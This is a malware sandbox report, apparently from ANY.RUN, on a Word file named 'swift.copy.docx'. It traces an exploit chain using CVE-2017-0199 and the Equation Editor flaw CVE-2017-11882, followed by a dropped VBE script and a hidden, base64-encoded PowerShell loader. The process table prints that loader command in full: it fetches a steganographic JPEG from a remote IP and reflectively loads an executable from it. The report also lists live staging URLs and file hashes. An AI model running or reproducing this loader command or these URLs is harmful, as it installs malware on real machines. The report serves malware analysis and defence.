File name:

swift.copy.docx

Full analysis: https://app.any.run/tasks/07ec7938-ee19-42c2-ab41-716070c11218
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 17, 2025, 12:37:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
webdav
exploit
cve-2017-11882
cve-2017-0199
payload
ta558
apt
stegocampaign
loader
reverseloader
susp-powershell
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

07DA0A5DF6596BF11075BDE96D5C824E

SHA1:

1FC9E557D0B799EB53A66538B6D1084777DC925B

SHA256:

78D5DCF7E1BCF3938F5222C467815ECD0F02B50A1C032A86F7C431CF5041306F

SSDEEP:

6144:zuVDSKFwU76pPjiH0qDQ2VseeikCqTnlYXa4:zu9SIH7OOM2O1iDklCa4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (likely CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1996)

    • CVE-2017-0199 detected

      • WINWORD.EXE (PID: 2060)

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 1996)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 676)

    • STEGOCAMPAIGN has been detected (SURICATA)

      • powershell.exe (PID: 676)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 676)

    • Payload loading activity detected

      • powershell.exe (PID: 676)

    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 676)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 676)

  • SUSPICIOUS

    • Abuses WebDav for code execution

      • svchost.exe (PID: 832)

    • Connects to the server without a host name

      • WINWORD.EXE (PID: 2060)
      • EQNEDT32.EXE (PID: 1996)
      • powershell.exe (PID: 676)

    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 832)

    • Reads security settings of Internet Explorer

      • EQNEDT32.EXE (PID: 1996)

    • Reads the Internet Settings

      • EQNEDT32.EXE (PID: 1996)
      • wscript.exe (PID: 1028)
      • powershell.exe (PID: 676)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1028)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1028)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 1028)

    • Executes script without checking the security policy

      • powershell.exe (PID: 676)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 1028)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 1028)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 676)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 1028)

  • INFO

    • Checks supported languages

      • EQNEDT32.EXE (PID: 1996)

    • Reads the computer name

      • EQNEDT32.EXE (PID: 1996)

    • Reads the machine GUID from the registry

      • EQNEDT32.EXE (PID: 1996)

    • Checks proxy server information

      • EQNEDT32.EXE (PID: 1996)

    • Creates files or folders in the user directory

      • EQNEDT32.EXE (PID: 1996)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • EQNEDT32.EXE (PID: 1996)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 676)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 676)

    • Disables trace logs

      • powershell.exe (PID: 676)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 676)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 676)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 676)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 676)

    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2025:05:16 11:34:52
ZipCRC: 0xf5c0e2b4
ZipCompressedSize: 432
ZipUncompressedSize: 2503
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: 1 minute
Pages: 1
Words: -
Characters: -
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
Company: Grizli777
LinksUpToDate: No
CharactersWithSpaces: -
SharedDoc: No
HyperlinksChanged: No
AppVersion: 12
Keywords: -
LastModifiedBy: 91974
RevisionNumber: 2
CreateDate: 2025:05:15 05:27:00Z
ModifyDate: 2025:05:15 05:28:00Z

XMP

Title: -
Subject: -
Creator: 91974
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
5
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #CVE-2017-0199 winword.exe eqnedt32.exe wscript.exe no specs #STEGOCAMPAIGN powershell.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
676"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$distantial = 'JABtAGkAYwByAG8AZAByAG8AcABsAGUAdAAgAD0AIAAnAHQAeAB0AC4AZQBwAG8AaABvAGQAZQB3AGcAaQBuAG4AdQByAGwAbABpAHcAZQB3AHIAdAB1AGYAaAB0AGkAdwBnAG4AaQBlAGUAcwAvADAANgA5AC8ANAA2ADEALgA3ADQALgAzADcAMQAuADcAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAZwB1AGQAbwBrACAAPQAgACQAbQBpAGMAcgBvAGQAcgBvAHAAbABlAHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAHAAcwBlAHUAZABvAGcAbABpAG8AbQBhACAAPQAgACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADMALgAyADQAMwAuADEANwAyAC8AeABhAG0AcABwAC8AYwBzAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJABzAHQAdQBiAGIAbAB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHMAdAB1AGIAYgBsAHkALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACcATQBvAHoAaQBsAGwAYQAvADUALgAwACcAKQA7ACQAbQBhAHMAYwB1AGwAaQBuAGUAIAA9ACAAJABzAHQAdQBiAGIAbAB5AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHAAcwBlAHUAZABvAGcAbABpAG8AbQBhACkAOwAkAHUAbgB3AGEAcgByAGEAbgB0AGUAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAG0AYQBzAGMAdQBsAGkAbgBlACkAOwAkAHcAaABlAGwAcABlAGQAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGMAaABvAG0AcABpAG4AZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB3AGUAYQByAGkAZQBzAHQAIAA9ACAAJAB1AG4AdwBhAHIAcgBhAG4AdABlAGQALgBJAG4AZABlAHgATwBmACgAJAB3AGgAZQBsAHAAZQBkACkAOwAkAGkAbgB0AGUAcgBmAGUAcgBvAG4AIAA9ACAAJAB1AG4AdwBhAHIAcgBhAG4AdABlAGQALgBJAG4AZABlAHgATwBmACgAJABjAGgAbwBtAHAAaQBuAGcAKQA7ACQAdwBlAGEAcgBpAGUAcwB0ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaQBuAHQAZQByAGYAZQByAG8AbgAgAC0AZwB0ACAAJAB3AGUAYQByAGkAZQBzAHQAOwAkAHcAZQBhAHIAaQBlAHMAdAAgACsAPQAgACQAdwBoAGUAbABwAGUAZAAuAEwAZQBuAGcAdABoADsAJABsAG8AZwBlAGkAbwBuACAAPQAgACQAaQBuAHQAZQByAGYAZQByAG8AbgAgAC0AIAAkAHcAZQBhAHIAaQBlAHMAdAA7ACQAbABpAG0AYgBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAJAB1AG4AdwBhAHIAcgBhAG4AdABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBlAGEAcgBpAGUAcwB0ACwAIAAkAGwAbwBnAGUAaQBvAG4AKQA7ACQAVwBpAG4AYwBrAGUAbABtAGEAbgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGwAaQBtAGIAbABlAHMAcwBuAGUAcwBzACkAOwAkAG4AaQBlAHIAZQBtAGIAZQByAGcAaQBhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFcAaQBuAGMAawBlAGwAbQBhAG4AbgApADsAJABjAGEAcgByAHUAYwBhAGcAZQAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAGcAdQBkAG8AawAsACcAJwAsACcAJwAsACcAJwAsACcAYQBzAHAAbgBlAHQAXwBjAG8AbQBwAGkAbABlAHIAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwB0AG8AcgBpAGYAeQAnACwAJwB2AGIAcwAnACwAJwAnACwAJwAnACwAJwBvAHAAaQBzAHQAaABvAGIAcgBhAG4AYwBoAHMAJwAsACcAMgAnACwAJwAnACkAKQA=' -replace '','';$misjudges = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($distantial));Invoke-Expression $misjudges;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
832C:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\System32\svchost.exe
services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1028"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\seeingwithfutrwewillrunnigwedohope.vbe" C:\Windows\System32\wscript.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1996"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2060"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Users\admin\Desktop\swift.copy.docxC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
15 604
Read events
14 602
Write events
672
Delete events
330

Modification events

(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:>s<
Value:
3E733C000C080000010000000000000000000000
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2060) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
1
Suspicious files
26
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2060WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2BAE.tmp.cvr
MD5:
SHA256:
2060WINWORD.EXEC:\Users\admin\Desktop\~$ift.copy.docxbinary
MD5:C9D7E803765F41655E297E2516A53D00
SHA256:BC20902FE6F97C00F72836DC6148BEAC1B054CE1CDBC669D9A59D6A30AD80AE8
2060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:58EF1716956932C231312A261C3B6B1C
SHA256:953E48BD12846678A8BEE5CE3AE2E7FC540BFD60E4A0B6E3F486CB7D2647763C
2060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:4A90329071AE30B759D279CCA342B0A6
SHA256:4F544379EDA8E2653F71472AB968AEFD6B5D1F4B3CE28A5EDB14196184ED3B60
2060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:E6091469F418A9F1CBEE0CAB925302F4
SHA256:53B963872536027561783CD3F2681285BB9103ADAD210C62C0AA93BEBA86CEF9
2060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:72DF0B75483ED2C435D751FDB2D7FC64
SHA256:93E4CE60EC227138D8522D8BAC3C273A857A64E326E3B0D4A14EACFB457AE18C
2060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:1FBB37F79B317A9A248E7C4CE4F5BAC5
SHA256:9BF639C595FE335B6F694EE35990BEFD2123F5E07FD1973FF619E3FC88F5F49F
2060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:D471A0BB5F0B8A9AC834E0172491B7F9
SHA256:418B6AE0A39787583DCD77DA0ED040F8C3DDA03410E71D04C235EE6E736F298F
2060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSFbinary
MD5:D471A0BB5F0B8A9AC834E0172491B7F9
SHA256:418B6AE0A39787583DCD77DA0ED040F8C3DDA03410E71D04C235EE6E736F298F
2060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:8A87693E291D70866EFAD10EF12065CA
SHA256:489BCCC540C2103C175A06598F3D58994B940232E44F33E2FD23D25FD9D35831
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
18
DNS requests
7
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2060
WINWORD.EXE
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?64e6d9de16fbebf7
unknown
whitelisted
2060
WINWORD.EXE
GET
200
216.58.206.35:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
2060
WINWORD.EXE
GET
200
216.58.206.35:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
2060
WINWORD.EXE
GET
200
107.173.47.164:80
http://107.173.47.164/960/wec/seeingwithfutrwewillrunnigwedohopeseeingwithfutrwew_____seeingwithfutrwewillrunnigwedohope________seeingwithfutrwewillrunnigwedoseeingwithfutrwewillhope.doc
unknown
unknown
2060
WINWORD.EXE
HEAD
200
107.173.47.164:80
http://107.173.47.164/960/wec/seeingwithfutrwewillrunnigwedohopeseeingwithfutrwew_____seeingwithfutrwewillrunnigwedohope________seeingwithfutrwewillrunnigwedoseeingwithfutrwewillhope.doc
unknown
unknown
1996
EQNEDT32.EXE
GET
200
107.173.47.164:80
http://107.173.47.164/960/seeingwithfutrwewillrunnigwedohope.vbe
unknown
unknown
676
powershell.exe
GET
200
192.3.243.172:80
http://192.3.243.172/xampp/cs/new_image.jpg
unknown
malicious
676
powershell.exe
GET
404
107.173.47.164:80
http://107.173.47.164/960/seeingwithfutrwewillrunnigwedohope.txt
unknown
unknown
2060
WINWORD.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120750
unknown
whitelisted
2060
WINWORD.EXE
POST
302
95.100.186.9:80
http://go.microsoft.com/fwlink/?LinkID=120751
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
whitelisted
1080
svchost.exe
224.0.0.252:5355
whitelisted
2060
WINWORD.EXE
188.114.97.3:443
smol.re
CLOUDFLARENET
NL
unknown
2060
WINWORD.EXE
199.232.210.172:80
ctldl.windowsupdate.com
FASTLY
US
whitelisted
2060
WINWORD.EXE
216.58.206.35:80
c.pki.goog
GOOGLE
US
whitelisted
832
svchost.exe
188.114.97.3:443
smol.re
CLOUDFLARENET
NL
unknown
2060
WINWORD.EXE
107.173.47.164:80
AS-COLOCROSSING
US
unknown
1996
EQNEDT32.EXE
107.173.47.164:80
AS-COLOCROSSING
US
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
smol.re
  • 188.114.97.3
  • 188.114.96.3
unknown
ctldl.windowsupdate.com
  • 199.232.210.172
  • 199.232.214.172
whitelisted
c.pki.goog
  • 216.58.206.35
whitelisted
go.microsoft.com
  • 95.100.186.9
whitelisted
activation.sls.microsoft.com
  • 40.91.76.224
whitelisted
dns.msftncsi.com
  • 131.107.255.255
whitelisted

Threats

PID
Process
Class
Message
2060
WINWORD.EXE
Potentially Bad Traffic
ET INFO Dotted Quad Host DOC Request
2060
WINWORD.EXE
Potentially Bad Traffic
ET HUNTING Microsoft Office User-Agent Requesting A Doc File
2060
WINWORD.EXE
Potentially Bad Traffic
ET INFO Dotted Quad Host DOC Request
2060
WINWORD.EXE
Misc activity
ET USER_AGENTS Microsoft Office Existence Discovery User-Agent
676
powershell.exe
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
676
powershell.exe
A Network Trojan was detected
ET MALWARE Base64 Encoded MZ In Image
676
powershell.exe
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
676
powershell.exe
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
676
powershell.exe
A Network Trojan was detected
ET MALWARE Base64 Encoded MZ In Image
676
powershell.exe
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
swift.copy.docx